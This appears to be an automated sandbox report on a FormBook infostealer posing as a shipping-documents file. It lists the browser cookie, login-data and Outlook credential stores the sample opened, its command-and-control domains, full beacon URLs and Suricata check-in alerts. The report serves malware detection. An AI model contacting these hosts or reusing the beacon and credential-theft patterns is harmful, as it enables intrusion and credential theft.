Source: C:\Windows\SysWOW64\SecEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\SecEdit.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\SecEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\SecEdit.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\SecEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\SecEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\SecEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\SecEdit.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 8.2.Original Shipping Documents.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Original Shipping Documents.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1742172690.0000000001960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3848860460.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3849067022.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3852328512.00000000051E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3849139713.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1741455772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3850140955.00000000032D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1744390860.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Screenshots

Behavior

Click here to start
Slideshow Behavior Animation

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.16.1	www.roastroots.lol	United States	13335	CLOUDFLARENETUS	false
13.248.169.48	www.iphone16.shop	United States	16509	AMAZON-02US	false
91.204.209.204	www.mediabin.info	United Kingdom	52148	RACKSRVGB	true
38.181.35.142	www.rhdrfny.top	United States	174	COGENT-174US	false
109.234.166.73	cyberpraxis.pro	France	50474	O2SWITCHFR	true
172.67.157.228	www.dietproio.info	United States	13335	CLOUDFLARENETUS	true
154.26.130.10	hindi.fit	United States	174	COGENT-174US	true
209.74.64.189	www.jellymint.site	United States	31744	MULTIBAND-NEWHOPEUS	true
3.33.130.190	venturegioballng.fun	United States	8987	AMAZONEXPANSIONGB	false

Contacted Domains

Name	IP	Active
www.mediabin.info	91.204.209.204	true
www.jellymint.site	209.74.64.189	true
www.iphone16.shop	13.248.169.48	true
www.rhdrfny.top	38.181.35.142	true
venturegioballng.fun	3.33.130.190	true
www.roastroots.lol	104.21.16.1	true
www.zthzzyg.top	38.181.35.142	true
www.dietproio.info	172.67.157.228	true
hindi.fit	154.26.130.10	true
cyberpraxis.pro	109.234.166.73	true
www.fix.shopping	13.248.169.48	true
www.cyberpraxis.pro	unknown	unknown
www.hindi.fit	unknown	unknown
www.venturegioballng.fun	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.mediabin.info/myyf/?NV0x=GlcGYC6HwpT8FabkC2tIIvL78tiN76bcfV84plwb5Nk3nkwE+AKc+Ww/obdAtKSDyrDzoNhn0jGqHXx8J9NsdxaajmTH1agn5G5dMUJahxrsZccDpQXyw5A=&fx=PJqHwJIxk	true	Avira URL Cloud: safe	unknown
http://www.jellymint.site/2sqb/	true	Avira URL Cloud: safe	unknown
http://www.cyberpraxis.pro/kemb/?NV0x=OtAuTPRl1kDBhmK2/ZcaDoTOd2MJoGv8l3k4MKxOdzSNFOYEX/q6kO1dEp++5effGBeOQEkgpP67gpLugdEwkzJNfsZQm0vYe/7xIMV/x9EFSgqr47CH1D8=&fx=PJqHwJIxk	true	Avira URL Cloud: safe	unknown
http://www.venturegioballng.fun/hd77/?fx=PJqHwJIxk&NV0x=RlzYfCAdwUb1Jru/CzszGz+qd5swGE7HqmFK4x+UffEP9q3zAfq1qiartZXEvxFFo0G04r8H3ye0T0T0dcsmHX5PnkXW4PMUevrRpetv/04XSqj9dko3Bk0=	true	Avira URL Cloud: safe	unknown
http://www.dietproio.info/vlio/?NV0x=G7HknLZOpYbpunPc2/Mlx0+cxkt8WTq0H6L3rInGHLbTuVGJGBGDqhana0vh34sPSPxfgwK5+WwJ6tgqsap1UbvXdhKYkdSrX12Wu80AYiseY/X7+dEpV24=&fx=PJqHwJIxk	true	Avira URL Cloud: safe	unknown
http://www.iphone16.shop/kagl/	true	Avira URL Cloud: safe	unknown
http://www.rhdrfny.top/5vpr/?fx=PJqHwJIxk&NV0x=+G0AH6DrGRv44yDCa/j2ssT4mfjo1sUoBGZRgbd1gS65+xyLkdtC0Cvs5le0Y1VYKQMTtp+fQhPKIiyCVjWgju6IEd/GUutEVJtULhj7mKOpmxKJPk9TuAI=	true	Avira URL Cloud: safe	unknown
http://www.zthzzyg.top/5qss/	true	Avira URL Cloud: safe	unknown
http://www.roastroots.lol/8cwp/?NV0x=KhipwiSlW/4Hb37kPStoE2pMnu59chQZ9ka6UWiIDNU9Q2YyUEAUpX0LWbEOlqQMn8pKMjxJQDnAF7TIB6qDd6fZ58RaxBuQLPS4FysLpPk0cqfTGDuCo5c=&fx=PJqHwJIxk	true	Avira URL Cloud: safe	unknown
http://www.iphone16.shop/kagl/?fx=PJqHwJIxk&NV0x=K95ulZCSolJS3eioycnjNGWafVzuHtQO2pkjqg3ejaxjnhs3tS5iRYVF5zFPvGGJqke4OJGl2WxEz9erEoLFVIvSNhKPQKc2BBaZOHjfEayNPL0E6HksTrU=	true	Avira URL Cloud: safe	unknown
http://www.mediabin.info/myyf/	true	Avira URL Cloud: safe	unknown
http://www.zthzzyg.top/5qss/?NV0x=Q7uHA4M8+SGSZm8H0sIwOGJ1uzobBzpe8sNnYolR9PVpRS3oJ0rxHB/TMtSDpzMfFZyb9/p20naNow9tF3+w/lLhFaEJKaBWgHepathAhUpBn8iETtZ+qDk=&fx=PJqHwJIxk	true	Avira URL Cloud: safe	unknown
http://www.dietproio.info/vlio/	true	Avira URL Cloud: safe	unknown
http://www.hindi.fit/50pk/?NV0x=UatWUPwGe7DsxKy0VpyPjoZZeqT3/D+oqE9HKyy052xkRbhlqvcyf+yJGchafTWHbhBRQJeXcW7pObH2VGdr3QNAdAMdYHmr6Qwwnm2JendAk1vhJi3wtCQ=&fx=PJqHwJIxk	true	Avira URL Cloud: safe	unknown
http://www.roastroots.lol/8cwp/	true	Avira URL Cloud: safe	unknown
http://www.rhdrfny.top/5vpr/	true	Avira URL Cloud: safe	unknown
http://www.venturegioballng.fun/hd77/	true	Avira URL Cloud: safe	unknown
http://www.fix.shopping/39bh/	true	Avira URL Cloud: malware	unknown
http://www.cyberpraxis.pro/kemb/	true	Avira URL Cloud: safe	unknown

AV Detection

Antivirus detection for URL or domain

Source: http://www.fix.shopping	Avira URL Cloud: Label: malware
Source: http://www.fix.shopping/39bh/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe

ReversingLabs: Detection: 75%

Multi AV Scanner detection for submitted file

Source: Original Shipping Documents.scr.exe	Virustotal: Detection: 36%			Perma Link
Source: Original Shipping Documents.scr.exe	ReversingLabs: Detection: 75%

Yara detected FormBook

Source: Yara match	File source: 8.2.Original Shipping Documents.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Original Shipping Documents.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1742172690.0000000001960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3848860460.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3849067022.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3852328512.00000000051E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3849139713.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1741455772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3850140955.00000000032D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1744390860.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 99.5%

Uses 32bit PE files

Source: Original Shipping Documents.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Original Shipping Documents.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: SecEdit.pdb source: Original Shipping Documents.scr.exe, 00000008.00000002.1741994583.0000000001768000.00000004.00000020.00020000.00000000.sdmp, xBk0IlKjg.exe, 0000000F.00000002.3849359280.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: SecEdit.pdbGCTL source: Original Shipping Documents.scr.exe, 00000008.00000002.1741994583.0000000001768000.00000004.00000020.00020000.00000000.sdmp, xBk0IlKjg.exe, 0000000F.00000002.3849359280.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Original Shipping Documents.scr.exe, 00000008.00000002.1743279814.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000003.1741743139.0000000002829000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000002.3850619845.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000003.1744475115.0000000002B10000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000002.3850619845.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Original Shipping Documents.scr.exe, Original Shipping Documents.scr.exe, 00000008.00000002.1743279814.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000003.1741743139.0000000002829000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000002.3850619845.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000003.1744475115.0000000002B10000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000002.3850619845.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dfxE.pdb source: Original Shipping Documents.scr.exe, xHOAJKcJeCXuc.exe.0.dr
Source:	Binary string: dfxE.pdbSHA256c source: Original Shipping Documents.scr.exe, xHOAJKcJeCXuc.exe.0.dr
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xBk0IlKjg.exe, 0000000F.00000000.1666851745.0000000000F1F000.00000002.00000001.01000000.0000000B.sdmp, xBk0IlKjg.exe, 00000011.00000000.1812032657.0000000000F1F000.00000002.00000001.01000000.0000000B.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49735 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49727 -> 109.234.166.73:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49743 -> 91.204.209.204:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49722 -> 154.26.130.10:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49751 -> 38.181.35.142:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49731 -> 209.74.64.189:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49747 -> 38.181.35.142:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49739 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49755 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49759 -> 172.67.157.228:80

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: RACKSRVGB RACKSRVGB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /50pk/?NV0x=UatWUPwGe7DsxKy0VpyPjoZZeqT3/D+oqE9HKyy052xkRbhlqvcyf+yJGchafTWHbhBRQJeXcW7pObH2VGdr3QNAdAMdYHmr6Qwwnm2JendAk1vhJi3wtCQ=&fx=PJqHwJIxk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.hindi.fitConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)
Source: global traffic	HTTP traffic detected: GET /kemb/?NV0x=OtAuTPRl1kDBhmK2/ZcaDoTOd2MJoGv8l3k4MKxOdzSNFOYEX/q6kO1dEp++5effGBeOQEkgpP67gpLugdEwkzJNfsZQm0vYe/7xIMV/x9EFSgqr47CH1D8=&fx=PJqHwJIxk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.cyberpraxis.proConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)
Source: global traffic	HTTP traffic detected: GET /2sqb/?fx=PJqHwJIxk&NV0x=+fltX0Xxpe/2LSVD8m4BrtVqS8n/YOcrmcHmQiB7a7fOdTqL57f3jcjaSrihHS6K1XFnl/jmmnj08U3CIiqGBEHW915YAb6OBksulDhZFx+MDvATO4qO2ho= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.jellymint.siteConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)
Source: global traffic	HTTP traffic detected: GET /8cwp/?NV0x=KhipwiSlW/4Hb37kPStoE2pMnu59chQZ9ka6UWiIDNU9Q2YyUEAUpX0LWbEOlqQMn8pKMjxJQDnAF7TIB6qDd6fZ58RaxBuQLPS4FysLpPk0cqfTGDuCo5c=&fx=PJqHwJIxk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.roastroots.lolConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)
Source: global traffic	HTTP traffic detected: GET /kagl/?fx=PJqHwJIxk&NV0x=K95ulZCSolJS3eioycnjNGWafVzuHtQO2pkjqg3ejaxjnhs3tS5iRYVF5zFPvGGJqke4OJGl2WxEz9erEoLFVIvSNhKPQKc2BBaZOHjfEayNPL0E6HksTrU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.iphone16.shopConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)
Source: global traffic	HTTP traffic detected: GET /myyf/?NV0x=GlcGYC6HwpT8FabkC2tIIvL78tiN76bcfV84plwb5Nk3nkwE+AKc+Ww/obdAtKSDyrDzoNhn0jGqHXx8J9NsdxaajmTH1agn5G5dMUJahxrsZccDpQXyw5A=&fx=PJqHwJIxk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.mediabin.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)
Source: global traffic	HTTP traffic detected: GET /5vpr/?fx=PJqHwJIxk&NV0x=+G0AH6DrGRv44yDCa/j2ssT4mfjo1sUoBGZRgbd1gS65+xyLkdtC0Cvs5le0Y1VYKQMTtp+fQhPKIiyCVjWgju6IEd/GUutEVJtULhj7mKOpmxKJPk9TuAI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.rhdrfny.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)
Source: global traffic	HTTP traffic detected: GET /5qss/?NV0x=Q7uHA4M8+SGSZm8H0sIwOGJ1uzobBzpe8sNnYolR9PVpRS3oJ0rxHB/TMtSDpzMfFZyb9/p20naNow9tF3+w/lLhFaEJKaBWgHepathAhUpBn8iETtZ+qDk=&fx=PJqHwJIxk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.zthzzyg.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)
Source: global traffic	HTTP traffic detected: GET /hd77/?fx=PJqHwJIxk&NV0x=RlzYfCAdwUb1Jru/CzszGz+qd5swGE7HqmFK4x+UffEP9q3zAfq1qiartZXEvxFFo0G04r8H3ye0T0T0dcsmHX5PnkXW4PMUevrRpetv/04XSqj9dko3Bk0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.venturegioballng.funConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)
Source: global traffic	HTTP traffic detected: GET /vlio/?NV0x=G7HknLZOpYbpunPc2/Mlx0+cxkt8WTq0H6L3rInGHLbTuVGJGBGDqhana0vh34sPSPxfgwK5+WwJ6tgqsap1UbvXdhKYkdSrX12Wu80AYiseY/X7+dEpV24=&fx=PJqHwJIxk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.dietproio.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.8)

Source: global traffic	DNS traffic detected: DNS query: www.hindi.fit
Source: global traffic	DNS traffic detected: DNS query: www.cyberpraxis.pro
Source: global traffic	DNS traffic detected: DNS query: www.jellymint.site
Source: global traffic	DNS traffic detected: DNS query: www.roastroots.lol
Source: global traffic	DNS traffic detected: DNS query: www.iphone16.shop
Source: global traffic	DNS traffic detected: DNS query: www.mediabin.info
Source: global traffic	DNS traffic detected: DNS query: www.rhdrfny.top
Source: global traffic	DNS traffic detected: DNS query: www.zthzzyg.top
Source: global traffic	DNS traffic detected: DNS query: www.venturegioballng.fun
Source: global traffic	DNS traffic detected: DNS query: www.dietproio.info
Source: global traffic	DNS traffic detected: DNS query: www.fix.shopping

Source: unknown

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 25 Apr 2025 14:06:15 GMTContent-Type: text/htmlContent-Length: 1251Connection: closeVary: Accept-Encodingcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cacheServer: o2switch-PowerBoost-v3Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 25 Apr 2025 14:06:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 25 Apr 2025 14:06:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 